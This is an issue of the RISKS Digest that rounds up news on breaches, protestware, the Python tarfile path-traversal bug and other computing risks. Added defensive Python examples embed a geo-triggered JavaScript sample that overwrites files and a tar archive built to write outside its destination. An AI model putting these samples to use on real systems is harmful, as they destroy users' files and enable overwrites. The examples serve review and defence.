The RISKS Digest
Volume 33 Issue 46

Thursday, 29th September 2022

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator


Contents

`Our world is in peril,' UN secretary general warns general assembly
CBC
The UN Wants to Curb Anti-Satellite Missile Tests
WiReD
Vulnerability of insulin pumps
Healio via Judith Hemenway
Optus' breach exposes 9.8M customers' data
ABC-AU
Tesla Megapack battery fire spurs shelter-in-place warning in California
The Verge
Multiple driverless Cruise cars block traffic in San Francisco
SanFranChron
Automakers are ignoring the simple solution to the rise of traffic deaths
The Verge
Egypt's submarine cable stranglehold
Sebastian Moss
'Protestware' is on the rise, with programmers self-sabotaging their own code. Should we be worried?
Techxplore.com
Morgan Stanley Smith Barney to Pay $35 Million for Extensive Failures to Safeguard Personal Information of Millions of Customers
SEC
NY Suffolk Co. "911" system crippled by cyberattack, other gov't functions also
WNBC
American Airlines says hackers obtained some customer/employee data
Engadget
LastPass says hackers had internal access for four days
Bleeping Computer
15-Year-Old Python Bug Allows Code Execution in 350k Projects
Ionut Ilascu
Artist finds private medical record photos in popular AI training data set
ArsTechnica
Uber blames contractor for hack
Lauren Weinstein
Luxury cars seized from 23-year-old 'Crypto King' as investors try to recoup millions
CBC
33% of U.S. TikTok users say they regularly get their news on the app, up from 22% in 2020
TechCrunch
TikTok's search engine repeatedly delivers misinformation to its majority-young user base, report says
CNN
A common phishing attack sources from Gmail
Lauren Weinstein
Wegmans Discontinues Self-Checkout App, Citing Losses
NYTimes
Health apps share your concerns with advertisers. HIPAA can't stop it.
WashPost
NTSB wants all new vehicles to check drivers for alcohol use
NPR
How vigilante *predator catchers* are infiltrating the criminal justice system
WashPost
Senators introduce a bill to protect open-source software
WashPost
Open-Source Software That Lasts a Thousand Years?
Liam Tung
The ITU's Secretary-General Election Could Shape the Internet's Future
WiReD
Info on RISKS (comp.risks)

`Our world is in peril,' UN secretary general warns general assembly (CBC)

Matthew Kruk <mkrukg@gmail.com>
Tue, 20 Sep 2022 09:58:10 -0600
https://www.cbc.ca/news/world/antonio-guterres-1.6588574

He also warned of what he called "a forest of red flags" around new
technologies despite promising advances to heal diseases and connect people.
Guterres said social media platforms are based on a model "that monetizes
outrage, anger, and negativity." Artificial intelligence, he said, "is
compromising the integrity of information systems, the media, and indeed
democracy itself."


The UN Wants to Curb Anti-Satellite Missile Tests (WiReD)

Gabe Goldberg <gabe@gabegold.com>
Mon, 19 Sep 2022 01:00:13 -0400
At a high-profile meeting in Geneva, international negotiators are moving
closer toward developing rules for space actors in low Earth orbit and
beyond.

https://www.wired.com/story/the-un-wants-to-curb-anti-satellite-missile-tests/


Vulnerability of insulin pumps (Healio)

Judith Hemenway <Judith@divingturtle.com>
Wed, 21 Sep 2022 18:35:13 +0000
Although the insulin pumps are not accessible via the Internet, they are
vulnerable via pairing from nearby devices.  Causing the pump to deliver
either too much or too little insulin can be life-threatening.

https://www.healio.com/news/endocrinology/20220920/fda-warns-of-possible-cybersecurity-risk-with-medtronic-minimed-600-series-insulin-pumps


Optus' breach exposes 9.8M customers' data (ABC-AU)

John Colville <John.Colville@uts.edu.au>
Mon, 26 Sep 2022 21:00:04 +0000
Optus is Australia's second largest Telco.

https://www.abc.net.au/news/2022-09-23/optus-rejects-claim-hack-likely-result-of-human-error/101468846
https://www.abc.net.au/news/2022-09-25/new-security-measures-to-be-unveiled-following-optus-data-breach/101472364


Tesla Megapack battery fire spurs shelter-in-place warning in California (The Verge)

Monty Solomon <monty@roscom.com>
Tue, 20 Sep 2022 22:08:28 -0400
https://www.theverge.com/2022/9/20/23363345/tesla-megapack-battery-fire-california-monterey-pg-and-e


Multiple driverless Cruise cars block traffic in San Francisco (SanFranChron)

geoff goodfellow <geoff@iconia.com>
Tue, 27 Sep 2022 15:32:08 -0700
At least three driverless Cruise cars were responsible for holding up
traffic and reportedly blocking a bus lane in San Francisco last week, the
latest in a string of incidents involving the locally headquartered
self-driving car company.

A video shared on Reddit showed two of Cruise's vehicles at a standstill
Thursday evening, near the intersection of Sacramento and Leavenworth
streets, with their hazard lights flashing. A Muni bus appeared to be
stalled about a block behind them.

"Come on, we've got to get the f*** going," one person could be heard
yelling in the background of the video.  "There's no driver!" another
responded.

https://www.sfgate.com/local/article/driverless-cruise-cars-block-SF-traffic-17467985.php


Automakers are ignoring the simple solution to the rise of traffic deaths (The Verge)

Monty Solomon <monty@roscom.com>
Mon, 19 Sep 2022 19:34:14 -0400
Automakers are ignoring the simple solution to the rise of traffic deaths
https://www.theverge.com/23360839/cars-speed-safety-traffic-deaths-technology-usdot


Egypt's submarine cable stranglehold (Sebastian Moss)

Dewayne Hendricks <dewayne@warpspeed.com>
September 20, 2022 21:17:26 JST
Sebastian Moss, Datacenter Dynamics, 15 Sep 2022
Understanding the Middle East bottleneck, and how things could be set to
change
https://www.datacenterdynamics.com/en/analysis/egypts-submarine-cable-stranglehold/

The world's digital infrastructure has been built by the paranoid. At every
turn, equipment is duplicated, routes are triplicated, fuel reserves are
over-filled. Astronomical sums are spent on building layers and layers of
safety into the system, as suspicious minds game out various scenarios that
could put the precious flow of data at risk.  And yet, there remains one
giant bottleneck, a quirk of geography and geopolitics, that is anything but
redundant.

If you take a map of the world's submarine cable infrastructure, responsible
for shuttling data between nations and entire continents, and zoom in on the
Middle East, you will notice something striking: Everything goes through
Egypt.

Data traveling to and from Europe and Asia, as well as Northern Africa and
the Middle East itself, has just one route.

Coming from the Gulf of Aden, cables snake up along the Red Sea, and into
the Gulf of Suez. There, they make landfall in Egypt, traversing little more
than a hundred miles, before breaking out into the Mediterranean Sea.

"There's no way a network operator would design their network like this
under ideal conditions, right?" said Paul Brodsky, senior analyst at
Telegeography, best known for its maps of cable routes. "They don't like
having everything funneled through one place."

This route concentration is a concern for reliability, putting an estimated
17 percent of the world's Internet traffic in the hands of one country, and
in one shallow and narrow sea. But it is also a concern for businesses,
which have to contend with a monopoly.

To get through Egypt, companies have to pay exorbitant fees to state-owned
Telecom Egypt. Prices have risen dramatically, amid claims of corruption,
but operators have had little choice but to pay. At least until now.

The only route

The story of Egypt's submarine stranglehold is hard to tell. Several
analysts declined to talk on the record due to business relationships with
Telecom Egypt. Cable providers either declined to talk, or did not respond
to requests for comment.  "I am afraid I won't be open to discuss the
Egyptian submarine cable bottleneck due to certain concerns," another
industry figure said, declining to elaborate.

In Egypt itself, it's even harder to talk about the cable situation.  In
2019, the TV host of local news program 90 minutes, Ossama Kamal, accused
the government of corruption with the way it charges submarine cable
operators, and said it risked destroying its position as the gateway between
Asia and Europe.

Immediately following the broadcast, he was suspended from his show, fined,
and forced to apologize. He did not respond to requests for comment.

Whether Telecom Egypt abuses its market dominance is a matter of debate --
some, speaking on background, called fees extortionate.  Others accepted it
as the cost of business for using the most logical route through the Middle
East, with more than a dozen major cables choosing to go across the country.

Egypt's position as a critical communications node between East and West
dates all the way back to the colonial era, and remains, due to a few simple
reasons.

First is geography: It's the shortest stretch of land between the
Mediterranean and Arabian seas, hence the creation of the Suez Canal for
shipping. Network operators like to avoid needlessly traveling across land,
with its expensive owners and pesky national sovereignties that need to be
dealt with.

Then comes geopolitics. Do Western companies want data to travel through
Iran? How about Iraq, Afghanistan, or Syria? Operators like to steer clear
of sanctioned nations, or active war zones, so they are off most people's
preferred routes—although some have still tried, but we'll get to that
later. There is one other journey they could take, but that too, we shall
save.

Finally, there are market forces. "Once you establish a route and
everybody's using it, the cost goes down as more people use it," Doug
Madory, director of Internet analysis at Kentik, explained. "So it's really
hard not to use it, and it's hard to break out of what ends up being the
most selected path.

"With this Egypt chokepoint, obviously the geographic layout is the number
one reason, but then once it gets established, it's super hard to break out
because then there's so many cables, so many lines, so much infrastructure
built along that path."

With this in its favor, Telecom Egypt has been able to charge huge fees --
between 6.6 percent and 17.4 percent of its total revenues came from cable
fees between 2008 to 2019, according to Submarine Cable Networks. The
founder of SCN declined to comment.

It took a while for the state telco to realize it was sitting on a goldmine:
It used to sell a perpetual license for somewhere in the ballpark of
$100k. Then they moved to a monthly fee, a source told DCD. "Then they said
'oh no, we want to have the transit costs, where people pay by volume of
traffic.' So if tomorrow traffic doubles for a telecom, they get double pay
or whatever the tiering system is," Madory said. "I feel like that was too
far—people started to revolt, although what can you do? It's not like
there's another Egypt you can go to."

Another industry figure called the fees "ridiculous." An SCN report found
that 12 submarine cables crossing Egypt paid the telco at least $369 million
for Indefeasible Right of Use, with additional Operation and Maintenance
(O&M) charges during the lifetime - however, it is not clear if this is
before the telco tried to shift to charging more for more traffic.

  [Long item.  The rest is PGN-truncated for RISKS.]


'Protestware' is on the rise, with programmers self-sabotaging their own code. Should we be worried? (Techxplore.com)

Richard Marlon Stein <rmstein@protonmail.com>
Thu, 29 Sep 2022 00:23:17 +0000
https://techxplore.com/news/2022-09-protestware-programmers-self-sabotaging-code.html

"In March 2022, the author of node-ipc, a software library with over a
million weekly downloads, deliberately broke their code. If the code
discovers it is running within Russia or Belarus, it attempts to replace the
contents of every file on the user's computer with a heart emoji."

Open-source software dependencies are ubiquitous. Most, if not all,
open-source components are adopted and integrated without substantial or any
code review. Never mind the details, get that stack to work and sell, sell,
sell.  [...]

NIST's "Security and Privacy Controls for Information Systems and
Organizations" identifies two control family items emphasizing code reviews
as a method for reducing cybersecurity risks: RA-5 (Vulnerability Monitoring
and Scanning), SA-11 (Developer Testing and Evaluation).
(https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf)

Intentional sabotage or denial of service keyed to conditional run-time
factors: location of use, date/time of day, IP address/domain, etc.

Extremely nefarious risk.
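
As an added example (not code from the article, and not node-ipc's code), here are two checks a dependency-review gate can run before an open-source package is adopted, in Python: first, verify that the tarball actually fetched matches the integrity hash pinned in package-lock.json, so a silently republished or tampered version is caught rather than installed; second, a static heuristic that flags a source file containing both a run-time trigger (geo-IP lookup, country comparison, date check) and a destructive bulk file operation, which is the shape of the node-ipc incident quoted above. The lockfile, tarball bytes and JavaScript samples are all constructed for the demonstration.

```python
"""Added example, not from the article or from node-ipc: two checks a
dependency-review gate can run before adopting an open-source package."""
import base64
import hashlib
import json
import re

# --- (1) lockfile integrity ------------------------------------------------

SRI_ALGS = ("sha256", "sha384", "sha512")   # what SRI permits; sha1 is rejected

def sri(data: bytes, alg: str = "sha512") -> str:
    """Encode bytes as an npm-style Subresource Integrity string '<alg>-<b64>'."""
    return f"{alg}-{base64.b64encode(hashlib.new(alg, data).digest()).decode()}"

def verify_lockfile_integrity(lockfile_json: str, tarballs: dict) -> list:
    """Compare each non-root entry of a package-lock v2/v3 'packages' map with
    the tarball bytes actually downloaded. Returns the entries that fail or
    cannot be checked (missing integrity, weak algorithm, no bytes supplied)."""
    failures = []
    for path, meta in json.loads(lockfile_json).get("packages", {}).items():
        if path == "":                      # "" is the project itself
            continue
        integrity = meta.get("integrity", "")
        alg, _, _expected = integrity.partition("-")
        data = tarballs.get(path)
        if alg not in SRI_ALGS or data is None or sri(data, alg) != integrity:
            failures.append(path)
    return failures

# Constructed sample data (fake tarball bytes, not real packages).
DEMO_LIB = b"contents of demo-lib-1.0.0.tgz"
OTHER_LIB_PINNED = b"contents of other-lib-2.0.0.tgz as first reviewed"
LOCKFILE = json.dumps({
    "name": "app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/demo-lib": {"version": "1.0.0", "integrity": sri(DEMO_LIB)},
        "node_modules/other-lib": {"version": "2.0.0", "integrity": sri(OTHER_LIB_PINNED)},
    },
})
FETCHED = {   # what the registry handed back this time; other-lib was republished
    "node_modules/demo-lib": DEMO_LIB,
    "node_modules/other-lib": b"contents of other-lib-2.0.0.tgz, silently republished",
}

# --- (2) conditional-sabotage heuristic ------------------------------------

# Constructed JavaScript mimicking the pattern the article describes.
SUSPECT_JS = r"""
const fs = require("fs");
const https = require("https");
https.get("https://api.ipgeolocation.io/ipgeo", res => {
  let body = "";
  res.on("data", chunk => body += chunk);
  res.on("end", () => {
    const country = JSON.parse(body).country_code2;
    if (country === "RU" || country === "BY") {
      for (const f of fs.readdirSync(process.cwd())) {
        fs.writeFileSync(f, "\u2764\ufe0f");
      }
    }
  });
});
"""
BENIGN_JS = r"""
const fs = require("fs");
exports.save = (path, data) => fs.writeFileSync(path, JSON.stringify(data));
"""

# Either class alone is common in honest code; the combination is the signal.
TRIGGERS = {
    "geo_ip_lookup": re.compile(r"ip(geo|info|api)|geolocation|country_code", re.I),
    "country_compare": re.compile(r'===?\s*"[A-Z]{2}"'),
    "date_compare": re.compile(r"new Date\(\)|Date\.now\(\)"),
}
DESTRUCTIVE = {
    # a directory listing followed within ~300 chars by a write/delete call
    "bulk_write_or_delete": re.compile(
        r"readdir(Sync)?\([\s\S]{0,300}?(writeFile(Sync)?|unlink(Sync)?|rm(Sync)?)\("),
    "recursive_rm": re.compile(r"rm(Sync)?\([^)]*recursive\s*:\s*true"),
}

def scan_for_conditional_sabotage(source: str) -> dict:
    """Report which trigger and destructive indicators fire, and whether the
    file should be pulled for manual review (both classes present)."""
    triggers = [n for n, rx in TRIGGERS.items() if rx.search(source)]
    destructive = [n for n, rx in DESTRUCTIVE.items() if rx.search(source)]
    return {"triggers": triggers, "destructive": destructive,
            "needs_review": bool(triggers and destructive)}
```

Run against the constructed data, `verify_lockfile_integrity(LOCKFILE, FETCHED)` reports `node_modules/other-lib`, whose bytes no longer match the pinned digest, and `scan_for_conditional_sabotage(SUSPECT_JS)` marks the geo-triggered overwrite for review while the benign file passes. The heuristic is deliberately coarse: it is a triage filter to decide what a human reads, not a substitute for the code review the NIST controls above call for.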


Morgan Stanley Smith Barney to Pay $35 Million for Extensive Failures to Safeguard Personal Information of Millions of Customers (SEC)

José María Mateos <chema@rinzewind.org>
Tue, 20 Sep 2022 13:38:54 -0400
https://www.sec.gov/news/press-release/2022-168

The Securities and Exchange Commission today announced charges against
Morgan Stanley Smith Barney LLC (MSSB) stemming from the firm's extensive
failures, over a five-year period, to protect the personal identifying
information, or PII, of approximately 15 million customers. MSSB has agreed
to pay a $35 million penalty to settle the SEC charges.

The SEC's order finds that, as far back as 2015, MSSB failed to properly
dispose of devices containing its customers' PII. On multiple occasions,
MSSB hired a moving and storage company with no experience or expertise in
data destruction services to decommission thousands of hard drives and
servers containing the PII of millions of its customers. Moreover, according
to the SEC's order, over several years, MSSB failed to properly monitor the
moving company's work. The staff's investigation found that the moving
company sold to a third party thousands of MSSB devices including servers
and hard drives, some of which contained customer PII, and which were
eventually resold on an Internet auction site without removal of such
customer PII. While MSSB recovered some of the devices, which were shown to
contain thousands of pieces of unencrypted customer data, the firm has not
recovered the vast majority of the devices.

  [Long item.  The rest is PGN-truncated for RISKS.
  Also, Matthew Kruk noted a NYTimes item on this issue:
   Morgan Stanley Hard Drives With Client Data Turn Up on Auction Site
https://www.nytimes.com/2022/09/20/us/morgan-stanley-smith-barney-settlement.html
  PGN]


NY Suffolk Co. "911" system crippled by cyberattack, other gov't functions also (WNBC)

danny burstein <dannyb@panix.com>
Sat, 24 Sep 2022 21:52:19 +0000
Suffolk County Asks NYPD for Help After Hack Cripples 911 Call Center and
Police HQ

Ten days after a cyber attack hit Suffolk County computers, much of the
county's police department is still deeply feeling the effects—and is
calling on the NYPD for backup.

The 911 dispatch center at the Suffolk County Police Department headquarters
has been reduced to using pen and paper, after hackers took down the county
government's computers.

"Unfortunately had to go back to our old system where information is
recorded by hand and information is handed to the dispatcher, in contrast to
putting it into a computer-aided system," said Suffolk County Police
Commissioner Rodney Harrison.  [...]  And it's not just police hurting as a
result. Title searches, an essential part of real estate closings, have been
frozen too. Lawyers and buyers are trying to proceed with caution.

https://www.nbcnewyork.com/news/local/suffolk-county-hack-cripples-911-call-center-and-police-hq-as-they-turn-to-nypd-for-help/3871797/


American Airlines says hackers obtained some customer/employee data (Engadget)

Monty Solomon <monty@roscom.com>
Tue, 20 Sep 2022 22:10:08 -0400
https://www.engadget.com/american-airlines-data-breach-customer-employee-data-180132383.html?src=rss


LastPass says hackers had internal access for four days (Bleeping Computer)

Monty Solomon <monty@roscom.com>
Mon, 19 Sep 2022 14:56:36 -0400
https://www.bleepingcomputer.com/news/security/lastpass-says-hackers-had-internal-access-for-four-days/


15-Year-Old Python Bug Allows Code Execution in 350k Projects (Ionut Ilascu)

ACM TechNews <technews-editor@acm.org>
Fri, 23 Sep 2022 12:29:41 -0400 (EDT)
Ionut Ilascu, *BleepingComputer*, 21 Sep 2022, via ACM TechNews, 23 Sep 2022

An unpatched 15-year-old bug in the Python programming language could affect
more than 350,000 open-source repositories, and could lead to code
execution. The path traversal vulnerability, disclosed in 2007, resides in
the Python tarfile package, and can allow hackers to overwrite arbitrary
files. The flaw exists because the code in the extract function in Python's
tarfile module trusts data in the TarInfo object "and joins the path that is
passed to the extract function and the name in the TarInfo object." Analyst
Charles McFarland at extended detection and response solutions provider
Trellix rediscovered the bug while probing another security issue. No
reports indicate the bug has been exploited in attacks, although it remains
a threat in the software supply chain.

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f446x23641bx070841&
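
The vulnerable idiom and a hardened extractor, as an added example that is not from the article and not CPython's own code. The archive is constructed in memory with one benign member and one whose name climbs out of the extraction directory; `unsafe_extract` reproduces the behaviour described above, and `safe_extract` resolves every member's real path before writing and refuses anything that would land outside the destination, including symlinks and hardlinks whose target escapes. Python 3.12 added an extraction `filter` argument (backported to 3.8.17, 3.9.17, 3.10.12 and 3.11.4); `filter="data"` refuses escaping members on those interpreters, and the explicit path check covers the ones that lack it.

```python
"""Added example, not from the article: a tar member that escapes the
extraction directory, the extractall() idiom that writes it, and a
safe_extract() that refuses it."""
import io
import os
import tarfile
import tempfile

def build_malicious_tar() -> bytes:
    """Constructed archive: a benign file plus a member whose name climbs
    out of the extraction directory (the tarfile path-traversal pattern)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in (("readme.txt", b"harmless\n"),
                              ("../escaped.txt", b"written outside dest\n")):
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

def unsafe_extract(tar_bytes: bytes, dest: str) -> None:
    """The vulnerable idiom: extractall() trusting member names.
    filter='fully_trusted' reproduces the old behaviour on interpreters that
    have the filter argument; older ones lack it and behave this way anyway."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        try:
            tar.extractall(dest, filter="fully_trusted")
        except TypeError:            # no filter argument on this Python
            tar.extractall(dest)

def _is_within(base: str, target: str) -> bool:
    """True if target resolves to base or somewhere beneath it."""
    base, target = os.path.realpath(base), os.path.realpath(target)
    return target == base or target.startswith(base + os.sep)

def safe_extract(tar_bytes: bytes, dest: str) -> list:
    """Extract only members that stay inside dest; return the names refused."""
    rejected = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            target = os.path.join(dest, member.name)
            if os.path.isabs(member.name) or not _is_within(dest, target):
                rejected.append(member.name)
                continue
            if member.issym():       # symlink target is relative to the member
                link = os.path.join(os.path.dirname(target), member.linkname)
            elif member.islnk():     # hardlink target is relative to the archive root
                link = os.path.join(dest, member.linkname)
            else:
                link = None
            if link is not None and not _is_within(dest, link):
                rejected.append(member.name)
                continue
            try:
                tar.extract(member, dest, filter="data")   # second line of defence
            except TypeError:
                tar.extract(member, dest)
    return rejected

def demo() -> dict:
    """Run both extractors in scratch directories and report where the
    escaping member ended up (it lands one level above the destination)."""
    archive = build_malicious_tar()
    with tempfile.TemporaryDirectory() as tmp:
        unsafe_dest = os.path.join(tmp, "unsafe", "out")
        safe_dest = os.path.join(tmp, "safe", "out")
        os.makedirs(unsafe_dest)
        os.makedirs(safe_dest)
        unsafe_extract(archive, unsafe_dest)
        rejected = safe_extract(archive, safe_dest)
        return {
            "rejected": rejected,
            "readme_extracted": os.path.isfile(os.path.join(safe_dest, "readme.txt")),
            "escaped_after_unsafe": os.path.isfile(os.path.join(tmp, "unsafe", "escaped.txt")),
            "escaped_after_safe": os.path.isfile(os.path.join(tmp, "safe", "escaped.txt")),
        }

if __name__ == "__main__":
    print(demo())
```

The check is on `os.path.realpath`, not on the string `..`: a member named `a/../../x` or a symlink planted by an earlier member can escape without a literal leading `../`, so compare resolved paths. Resolution happens before each write, so a symlink extracted earlier in the same archive is taken into account when later members are checked.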


Artist finds private medical record photos in popular AI training data set (ArsTechnica)

Peter Neumann <neumann@csl.sri.com>
Mon, 26 Sep 2022 10:27:24 PDT
Late last week, a California-based AI artist who goes by the name Lapine
discovered private medical record photos taken by her doctor in 2013
referenced in the LAION-5B image set, which is a scrape of publicly
available images on the web. AI researchers download a subset of that data
to train AI image synthesis models such as Stable Diffusion and Google
Imagen.

https://arstechnica.com/information-technology/2022/09/artist-finds-private-medical-record-photos-in-popular-ai-training-data-set/


Uber blames contractor for hack

Lauren Weinstein <lauren@vortex.com>
Mon, 19 Sep 2022 13:31:29 -0700
So Uber is apparently blaming a contractor (sure, blame the contractor, so
typical) for the fact that Uber's corp network was so easily & broadly
penetrated by a hacker. If they had been using U2F keys & "zero trust"
security it's hard to see how this hack could have occurred. -L

  [Monty Solomon noted this item:
     Uber links breach to Lapsus$ group, blames contractor for hack
https://www.bleepingcomputer.com/news/security/uber-links-breach-to-lapsus-group-blames-contractor-for-hack/
  PGN]


Luxury cars seized from 23-year-old 'Crypto King' as investors try to recoup millions (CBC)

Matthew Kruk <mkrukg@gmail.com>
Fri, 23 Sep 2022 06:20:18 -0600
https://www.cbc.ca/news/canada/toronto/luxury-cars-seized-crypto-king-investors-try-recoup-millions-1.6583982

Two McLarens, two BMWs and a Lamborghini make up just a few of the $2M worth
of assets seized from a 23-year-old from Whitby, Ont., as his investors try
to recoup millions of dollars they handed over to the self-described *Crypto
King*.  But so far, Aiden Pleterski's assets fall far short of what his
investors claim they're owed.

Creditors are working to unravel where at least $35 million provided to
Pleterski and his company AP Private Equity Limited for cryptocurrency and
foreign exchange investments ended up, according to a fraud recovery lawyer
and documents filed in two separate actions reviewed by CBC Toronto.


33% of U.S. TikTok users say they regularly get their news on the app, up from 22% in 2020 (TechCrunch)

Monty Solomon <monty@roscom.com>
Tue, 20 Sep 2022 22:13:56 -0400
https://techcrunch.com/2022/09/20/33-of-u-s-tiktok-users-say-they-regularly-get-their-news-on-the-app-up-from-22-in-2020/


TikTok's search engine repeatedly delivers misinformation to its majority-young user base, report says (CNN)

Lauren Weinstein <lauren@vortex.com>
Mon, 19 Sep 2022 07:47:39 -0700
What the hell else would you expect from a Chinese search engine? -L

https://www.cnn.com/2022/09/18/business/tiktok-search-engine-misinformation/index.html


A common phishing attack sources from Gmail

Lauren Weinstein <lauren@vortex.com>
Mon, 19 Sep 2022 07:57:53 -0700
The vast majority of "fake invoice" phishing attacks (the ones that ask you
to call a phone number to cancel a "renewal" for example, where they then
ask for credit card info, etc.) appear to source from @gmail
addresses. Piles of them every day being sent to non-Gmail addresses. -L


Wegmans Discontinues Self-Checkout App, Citing Losses (NYTimes)

Jan Wolitzky <jan.wolitzky@gmail.com>
Mon, 19 Sep 2022 08:02:11 -0400
Self-checkout systems are intended to make shopping convenient, but they
also can lead to more thefts, experts said.

https://www.nytimes.com/2022/09/18/business/wegmans-self-checkout-shoplifting.html


Health apps share your concerns with advertisers. HIPAA can't stop it. (WashPost)

Monty Solomon <monty@roscom.com>
Thu, 22 Sep 2022 19:26:53 -0400
Tatum Hunter and Jeremy B. Merrill, *The Washington Post*, 22 Sep 2022
https://www.washingtonpost.com/technology/2022/09/22/health-apps-privacy/

From depression to HIV, we found popular health apps sharing potential health
concerns and user identifiers with dozens of ad companies.


NTSB wants all new vehicles to check drivers for alcohol use (NPR)

Gabe Goldberg <gabe@gabegold.com>
Tue, 20 Sep 2022 20:19:43 -0400
The recommendation also calls for systems to monitor a driver's behavior,
making sure they're alert. She said many cars now have cameras pointed at
the driver, which have the potential to limit impaired driving.

But Homendy says she also understands that perfecting the alcohol tests will
take time. "We also know that it's going to take time for NHTSA to evaluate
what technologies are available and how to develop a standard."

https://www.npr.org/2022/09/20/1124171320/autos-drunk-driving-blood-alcohol-system-ntsb

Interesting there's no mention of developments in driver assistance
features, let alone attempting autonomous driving.


How vigilante *predator catchers* are infiltrating the criminal justice system (WashPost)

Monty Solomon <monty@roscom.com>
Thu, 22 Sep 2022 19:06:07 -0400
How vigilante *predator catchers* are infiltrating the criminal justice
system.  It began with a live-streamed shaming in an Olive Garden parking
lot.  It ended with an Indiana cop on trial for child solicitation.

https://www.washingtonpost.com/dc-md-va/2022/09/22/prredator-catchers-vigilante-justice/


Senators introduce a bill to protect open-source software (WashPost)

Lauren Weinstein <lauren@vortex.com>
Sat, 24 Sep 2022 09:37:09 -0700
https://www.washingtonpost.com/politics/2022/09/22/senators-introduce-bill-protect-open-source-software/

  ALSO: Lawmakers introduce bill to tackle open-source software
  https://www.axios.com/2022/09/23/open-source-software-log4j-senate-bill

  [Protecting it sounds like what the offense does.
  Tackling it sounds what the defense does to the offense.
  I find the defensive second title *offensive*!  PGN]


Open-Source Software That Lasts a Thousand Years? (Liam Tung)

ACM TechNews <technews-editor@acm.org>
Fri, 23 Sep 2022 12:29:41 -0400 (EDT)
Liam Tung, *ZDNet*, 21 Sep 2022 via ACM Tech News 23 Sep 2022

GitHub has completed the construction of its Arctic Code Vault, a
21-terabyte snapshot of all public software repositories mainly encoded in
quick response codes and located 250 meters (820 feet) within a mountain in
Svalbard, Norway. The GitHub Archive Program's Jon Evans said, "Our hope is
that by storing and indexing millions of repositories, we have captured a
valuable cross-section of the world of modern software." The archive is
designed to last a millennium, with the snapshot stored on more than 180
film reels. A nearly 1.5-ton steel box contains the archive, and is
decorated with artificial intelligence-generated etchings to entice future
generations. Evans said the vault could potentially help someone who may
need software that is otherwise lost, and also will serve as a historical
record.

https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f446x23641ex070841&


The ITU's Secretary-General Election Could Shape the Internet's Future (WiReD)

Gabe Goldberg <gabe@gabegold.com>
Tue, 27 Sep 2022 18:53:06 -0400
UN countries are preparing to pick a new head of the International
Telecommunications Union. Who wins could shape the open Web's future.

Authoritarian states like China, Cordell wrote, "have increased their
interest and activism in the ITU, leading to concerns that their outsized
influence in standards setting may lead to the bifurcation of the Internet."
His time at the helm of the organization, according to Cordell, has been
marked by "highly favorable comments and decisions in support of Chinese
companies."  Huawei alone has submitted some 2,000 new standards proposals
to the organization, according to Cordell.

https://www.wired.com/story/2022-itu-secretary-general-election
